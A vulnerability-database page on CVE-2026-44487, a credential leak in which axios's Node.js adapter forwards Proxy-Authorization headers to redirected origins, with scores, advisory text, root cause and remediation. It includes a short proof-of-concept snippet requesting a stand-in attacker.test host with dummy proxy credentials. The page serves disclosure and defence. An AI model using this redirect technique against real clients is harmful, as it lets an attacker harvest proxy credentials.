Skip to main content

Axios EUVDEUVD-2026-36262

| CVE-2026-44487 HIGH
Insertion of Sensitive Information Into Sent Data (CWE-201)
2026-06-04 https://github.com/axios/axios GHSA-p92q-9vqr-4j8v
8.2
CVSS 4.0 · Vendor: https://github.com/axios/axios
Share

Severity by source

Vendor (https://github.com/axios/axios) PRIMARY
8.2 HIGH
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.1 MEDIUM

Network vector, no axios-side auth (PR:N), but high complexity and user/client interaction (must fetch attacker URL); scope changes from axios client to proxy, leaking confidential credentials only.

3.1 AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N
4.0 AV:N/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
Red Hat
7.5 HIGH
qualitative

Primary rating from Vendor (https://github.com/axios/axios).

CVSS VectorVendor: https://github.com/axios/axios

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
X

Lifecycle Timeline

6
Analysis Updated
Jun 11, 2026 - 17:45 vuln.today
v3 (cvss_changed)
Analysis Updated
Jun 11, 2026 - 17:45 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Jun 11, 2026 - 17:37 vuln.today
cvss_changed
CVSS changed
Jun 11, 2026 - 17:37 NVD
8.2 (HIGH)
Source Code Evidence Fetched
Jun 04, 2026 - 14:50 vuln.today
Analysis Generated
Jun 04, 2026 - 14:50 vuln.today

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 273 npm packages depend on axios (189 direct, 84 indirect)

Ecosystem-wide dependent count for version 1.0.0.

DescriptionCVE.org

Summary

Axios’s Node.js HTTP adapter may forward a Proxy-Authorization header to a redirected origin during specific proxy-to-direct redirect flows.

This affects Node.js usage, where an initial HTTP request is sent through an authenticated HTTP proxy, redirects are followed, and the redirected URL is no longer proxied. Under affected redirect shapes, the final origin can receive the proxy credential that was intended only for the outbound proxy.

Impact

A malicious or attacker-controlled origin can cause an axios client to disclose its configured proxy credentials if all required conditions are present.

The leak is limited to Node.js HTTP adapter requests. Browser, XHR, fetch, and React Native adapter paths are not affected by this Node-specific proxy handling path.

The practical impact depends on the leaked credentials. If the credential is reusable and the proxy is reachable by the attacker, the attacker may be able to authenticate to that proxy, subject to the proxy’s own network exposure, authorisation policy, and credential scope.

Affected Functionality

Affected functionality requires all of the following:

  • Axios running in Node.js with the HTTP adapter.
  • An initial http:// request using an authenticated proxy from config.proxy or proxy environment variables.
  • Redirect following enabled.
  • A redirect target for which no proxy applies, such as no matching HTTPS_PROXY or a matching NO_PROXY.
  • A redirect shape treated as same-host or otherwise not stripped by the redirect layer’s confidential-header handling.

Unaffected functionality includes browser adapters, requests with maxRedirects: 0, requests without proxy credentials, and redirect flows where the redirect layer strips Proxy-Authorization before axios reconfigures the redirected request.

Technical Details

In affected versions, lib/adapters/http.js adds Proxy-Authorization in setProxy() when a proxy with credentials is used.

Axios also installs redirect proxy handling so redirected requests can re-run proxy resolution. Before the fix, when the redirected request no longer resolved to a proxy, setProxy() did not clear a Proxy-Authorization header inherited from the previous request options. If follow-redirects did not remove that header for the specific redirect shape, the redirected direct request carried the stale proxy credential to the origin.

The 1.x fix in commit afca61a changes setProxy(options, configProxy, location, isRedirect) so redirect re-invocation removes every case variant of Proxy-Authorization before applying proxy settings for the next hop. Regression tests in tests/unit/adapters/http.test.js cover no-proxy redirects, NO_PROXY, different proxy targets, casing variants, and an end-to-end redirect flow.

The 0.x fixed release 0.32.0 includes a backport-style removeProxyAuthorization() guard in lib/adapters/http.js.

Proof of Concept of Attack

Safe local outline using dummy credentials:

js
process.env.HTTP_PROXY = 'http://user:pass@127.0.0.1:8080';
delete process.env.HTTPS_PROXY;

// The local HTTP proxy receives this request and returns:
// HTTP/1.1 302 Found
// Location: https://attacker.test/final
await axios.get('http://attacker.test/start');

Expected vulnerable behaviour:

text
Proxy receives initial request:
Proxy-Authorization: Basic dXNlcjpwYXNz

Final HTTPS origin receives redirected request:
Proxy-Authorization: Basic dXNlcjpwYXNz

Expected fixed behaviour:

text
Final HTTPS origin receives no Proxy-Authorization header.

Workarounds

Set maxRedirects: 0 and handle redirects manually, ensuring Proxy-Authorization is not copied to requests that are not sent through the proxy.

Avoid using reusable authenticated HTTP proxy credentials for requests to untrusted origins. If exposure is suspected, rotate the proxy credential.

<details> <summary>Original Source</summary>

Summary

Axios’s Node.js http adapter can incorrectly forward a retained Proxy-Authorization header to the final HTTPS origin during certain HTTP-to-HTTPS redirect flows.

When an initial HTTP request is sent through an authenticated HTTP_PROXY, and the redirected HTTPS request is sent directly because no proxy applies to the redirected HTTPS URL, Axios retains the stale Proxy-Authorization header and forwards it to the final origin.

Details

The issue occurs during a proxy-to-direct transition across redirects.

When Axios sends an initial HTTP request through an authenticated HTTP_PROXY, it correctly includes Proxy-Authorization for the proxy hop. If that response redirects to an HTTPS URL on the same hostname, and no proxy applies to the redirected HTTPS URL, the redirected request is sent directly to the final origin instead of through the proxy.

In the affected flow, the final HTTPS origin receives a Proxy-Authorization header value that was intended only for the outbound proxy.

Whether the issue is observable depends on how the redirect layer compares the host and port across the redirect. In the affected redirect shape, confidential-header handling does not remove the retained Proxy-Authorization header before the redirected request is sent.

Root Cause Analysis

Based on code review, Axios appears to create the stale header condition in its Node.js http adapter.

In lib/adapters/http.js:

  • When a proxy is used, Axios adds Proxy-Authorization in setProxy().
  • Axios also re-runs proxy resolution after redirects via its redirect hook.
  • However, when the redirected request no longer uses a proxy, Axios does not explicitly clear a previously set Proxy-Authorization header.

As a result, Axios correctly adds proxy credentials for the first proxied request, but does not clear them when a later redirected request becomes direct.

A dependent factor is the behavior of the redirect layer. In the affected redirect shape, confidential-header handling does not remove the retained Proxy-Authorization header before the redirected request is sent. This appears to be why the issue is observable only for certain redirect shapes.

Client Conditions
  • the initial HTTP request uses an authenticated HTTP_PROXY
  • no proxy applies to the redirected HTTPS URL (for example, no HTTPS_PROXY is configured)
  • redirects are followed
  • the redirect is treated as same-host by the redirect layer

Under that redirect shape, the retained Proxy-Authorization header is not removed before the redirected request is sent to the final HTTPS origin.

Reproduction Outline

Detailed reproduction instructions were shared with the maintainers during coordinated disclosure. The public outline below preserves the validated configuration and observable behavior needed to assess exposure, while omitting environment-specific test-harness details.

The issue was reproduced only in a researcher-controlled local test environment using dummy proxy credentials.

The issue was confirmed under the following conditions:

  • axios 1.13.6
  • follow-redirects 1.15.11
  • an authenticated proxy applying to the initial HTTP request
  • no proxy applying to the redirected HTTPS URL
  • redirects enabled
  • an HTTP-to-HTTPS redirect that is treated as same-host by the redirect layer
Observed behavior
  • The initial HTTP request is sent through the proxy and includes Proxy-Authorization.
  • The redirected HTTPS request is sent directly to the final origin.
  • The redirected HTTPS request still includes the previously generated Proxy-Authorization header.
  • The final origin can receive a Proxy-Authorization header value that was intended only for the proxy.
Expected behavior

Axios should not send the Proxy-Authorization header on a redirected request that is no longer sent through a proxy.

Impact

Under the affected redirect and proxy configuration, the final HTTPS origin may receive a retained Proxy-Authorization header value that was intended only for the outbound proxy.

If that credential is valid and reusable, and the outbound proxy is reachable by the attacker, the attacker may be able to authenticate to that proxy with the affected environment’s proxy credential, subject to the credential’s scope and the proxy’s access controls. </details>

---

AnalysisAI

Proxy credential disclosure in Axios Node.js HTTP adapter (versions <1.16.0 and <=0.31.1) allows a malicious or attacker-controlled origin to receive the configured Proxy-Authorization header during specific HTTP-to-HTTPS redirect flows where the redirected request bypasses the proxy. No public exploit identified at time of analysis, though the researcher published a safe local proof-of-concept outline. The leaked credential, if reusable and the proxy is reachable, enables the attacker to authenticate to the victim's outbound proxy.

Technical ContextAI

Axios is a widely used JavaScript HTTP client; the flaw lives in lib/adapters/http.js, the Node.js HTTP adapter that wraps Node's http/https modules and the follow-redirects library. When a proxy with credentials is configured (via config.proxy or HTTP_PROXY env vars), setProxy() injects a Basic-auth Proxy-Authorization header for the proxy hop. On redirect, axios re-runs proxy resolution, but prior to the fix it failed to clear the stale Proxy-Authorization when the redirected request no longer matched any proxy (e.g., no HTTPS_PROXY set or a NO_PROXY match). Combined with follow-redirects' confidential-header logic - which only strips sensitive headers when host/port comparison flags a cross-origin redirect - same-host HTTP→HTTPS redirects retained and forwarded the credential. This is a CWE-201 (Insertion of Sensitive Information Into Sent Data) class issue affecting only the Node HTTP adapter; browser XHR, fetch, and React Native adapters are unaffected because they do not implement this proxy code path. CPE coverage is pkg:npm/axios.

RemediationAI

Vendor-released patch: upgrade to axios 1.16.0 (1.x branch, fix commit afca61a updating setProxy to strip every case variant of Proxy-Authorization on redirect re-invocation) or 0.32.0 (0.x backport adding a removeProxyAuthorization() guard, plus broader proxy/cookie hardening - note the 0.32.0 breaking change that mergeConfig and header merging now return null-prototype objects, so consumers using direct property access on merged config must switch to Object.prototype.hasOwnProperty.call). See https://github.com/axios/axios/releases/tag/v1.16.0 and https://github.com/axios/axios/releases/tag/v0.32.0. If immediate upgrade is not feasible, set maxRedirects: 0 on axios requests that use authenticated proxies and handle redirects manually, ensuring Proxy-Authorization is not copied to direct requests (trade-off: every consumer of axios in the codebase must implement redirect handling, and silently breaks integrations that rely on automatic redirect following). Alternative compensating controls: stop embedding credentials in HTTP_PROXY / config.proxy and instead use IP-allowlisted or mTLS-authenticated proxies (eliminates the reusable secret), or scope proxy credentials so they are not reusable from arbitrary attacker networks. If exposure is suspected, rotate the proxy credential immediately.

CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2014-7205 CRITICAL POC
10.0 Oct 08

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2017-14849 HIGH POC
7.5 Sep 28

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc

CVE-2017-5941 CRITICAL POC
9.8 Feb 09

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner

CVE-2014-3744 HIGH POC
7.5 Oct 23

Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi

CVE-2014-9566 HIGH POC
7.5 Mar 10

Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin

CVE-2013-4660 MEDIUM POC
6.8 Jun 28

The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic

CVE-2015-5688 MEDIUM POC
5.0 Sep 04

Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2014-7192 CRITICAL POC
10.0 Dec 11

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat

CVE-2013-4450 MEDIUM POC
5.0 Oct 21

The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se

Vendor StatusVendor

Share

EUVD-2026-36262 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy